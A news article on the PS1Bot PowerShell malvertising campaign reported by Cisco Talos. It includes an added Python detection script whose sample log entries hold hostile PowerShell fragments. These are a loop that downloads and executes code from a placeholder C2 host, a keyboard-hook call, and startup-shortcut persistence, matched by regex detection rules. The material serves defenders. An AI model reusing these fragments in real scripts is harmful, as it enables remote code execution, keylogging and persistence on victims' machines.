Malvertising Campaign Deploys Modular PowerShell Malware PS1Bot

Aug. 14, 2025

An ongoing malware campaign active throughout 2025 is using malvertising to deliver a sophisticated PowerShell-based framework.

According to Cisco Talos researchers, the malware is named “PS1Bot” due to its similarities with the AHK Bot malware family. It deploys multiple malicious modules capable of stealing sensitive information, logging keystrokes, capturing screens and maintaining persistence.

The infection chain begins when victims download a compressed archive from a malicious advertisement or search engine optimization (SEO) poisoning link.

The archive contains a JavaScript file, “FULL DOCUMENT.js,” which embeds VBScript. Once executed, it retrieves a PowerShell script that polls a command-and-control (C2) server for further modules. These are executed in memory rather than written to disk, leaving fewer forensic traces.


Talos has identified distinct modules performing:

  • Antivirus detection

  • Screen capture

  • Cryptocurrency wallet and browser data theft

  • Keylogging and clipboard monitoring

  • System information gathering

  • Persistence

Each module reports status updates to the attacker via HTTP requests.

Notably, the “grabber” module targets dozens of web browsers and cryptocurrency wallet extensions, searching local drives for files containing wallet seed phrases or passwords before compressing and exfiltrating them.

The screen capture tool compiles and runs C# code at runtime to generate JPEG screenshots, which are later encoded and sent to the C2 server. The keylogger uses Windows API hooks to capture keystrokes and mouse events, alongside clipboard contents. Persistence is achieved by creating PowerShell scripts and shortcuts that reinitiate the C2 loop on system startup.
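The behaviours described above (a dropped script that polls the C2 and executes responses in memory, C# compiled at runtime to take JPEG screenshots, Windows hook-based keylogging, and startup-folder shortcuts that relaunch the C2 loop) are all things a defender can hunt for in PowerShell script-block logging. The following Python is an added example, not code from Talos or from PS1Bot itself: it runs a handful of correlation rules over constructed script-block entries and flags hosts where several distinct behaviours appear. The cmdlet and API names used in the rules (Add-Type, CopyFromScreen, SetWindowsHookEx, CreateShortcut, the Startup path) are this example's assumptions about how those behaviours usually surface in PowerShell, not indicators taken from the campaign.

```python
import re
from collections import defaultdict

# Detection rules derived from the behaviours the write-up attributes to PS1Bot.
# Every regex in a rule must match inside ONE script block. The cmdlet/API names
# are assumptions about how each behaviour typically appears in PowerShell,
# not strings taken from PS1Bot samples.
RULES = {
    # screen capture module: C# compiled at runtime, JPEG output
    "runtime_csharp_screenshot": [
        r"\bAdd-Type\b", r"System\.Drawing", r"CopyFromScreen|ImageFormat[.:]+Jpeg",
    ],
    # keylogger module: low-level Windows keyboard/mouse hooks
    "api_hook_keylogger": [
        r"SetWindowsHookEx", r"WH_KEYBOARD_LL|WH_MOUSE_LL",
    ],
    # persistence: a shortcut in a Startup folder that launches PowerShell
    "startup_shortcut_persistence": [
        r"\\Startup\\", r"\.lnk\b|CreateShortcut", r"powershell(\.exe)?",
    ],
    # loader: endless loop that fetches code from a C2 and executes it in memory
    "in_memory_c2_loop": [
        r"while\s*\(\s*\$true\s*\)",
        r"DownloadString|Invoke-WebRequest|Invoke-RestMethod",
        r"\bIEX\b|Invoke-Expression",
    ],
}

# Constructed script-block log entries (host, script text). WS-01 is ordinary
# admin activity; WS-02 carries fragments of the kind a modular PowerShell
# implant would leave behind. The domain is a reserved .invalid placeholder.
SAMPLE_EVENTS = [
    ("WS-01", r"Get-ChildItem C:\Logs -Filter *.log | Where-Object { $_.Length -gt 1MB }"),
    ("WS-01", r'Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show("Backup complete")'),
    ("WS-02", r'while ($true) { $t = (New-Object Net.WebClient).DownloadString("http://c2.example.invalid/" + $serial + "/task"); IEX $t; Start-Sleep 30 }'),
    ("WS-02", r'$src = "using System.Drawing; ... Graphics.CopyFromScreen(...); bmp.Save(path, ImageFormat.Jpeg);"; Add-Type -TypeDefinition $src -ReferencedAssemblies System.Drawing'),
    ("WS-02", r'Add-Type -TypeDefinition $hook; [KL]::SetWindowsHookEx(13, $cb, 0, 0)  # WH_KEYBOARD_LL'),
    ("WS-02", r'$ws = New-Object -ComObject WScript.Shell; $l = $ws.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\sync.lnk"); $l.TargetPath = "powershell.exe"'),
]


def match_rules(block: str) -> list[str]:
    """Return the names of every rule whose patterns all occur in `block`."""
    return [name for name, pats in RULES.items()
            if all(re.search(p, block, re.IGNORECASE) for p in pats)]


def triage(events) -> dict[str, list[str]]:
    """Collect the distinct rule hits per host across all of its script blocks."""
    per_host = defaultdict(set)
    for host, block in events:
        per_host[host].update(match_rules(block))
    return {host: sorted(hits) for host, hits in per_host.items()}


def flagged_hosts(events, min_rules: int = 2) -> list[str]:
    """Hosts showing at least `min_rules` distinct behaviours.

    A single hit (a lone Add-Type, say) is weak evidence. A modular implant
    drops several modules, each logged as its own script block, so correlating
    hits per host is what separates it from routine admin scripting.
    """
    return sorted(h for h, hits in triage(events).items() if len(hits) >= min_rules)


if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(hits) or 'no hits'}")
    print("flagged:", flagged_hosts(SAMPLE_EVENTS))
```

Each rule requires all of its patterns inside one script block, which keeps a benign Add-Type or a normal web request from firing on its own; the per-host threshold then requires more than one module-like behaviour before a host is flagged. Tune the patterns to what your own script-block logs actually contain before relying on them.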

While Talos has not observed the Skitnet binary directly, overlaps in infrastructure, module design and URL construction suggest links to campaigns distributing Skitnet/Bossnet.

The researchers also note architectural similarities to AHK Bot, including using drive serial numbers to build C2 paths and a modular design enabling rapid updates.

Talos has assessed that additional, undiscovered PS1Bot modules likely exist. The malware’s flexible framework and active development indicate it will continue evolving as attackers adapt its capabilities.

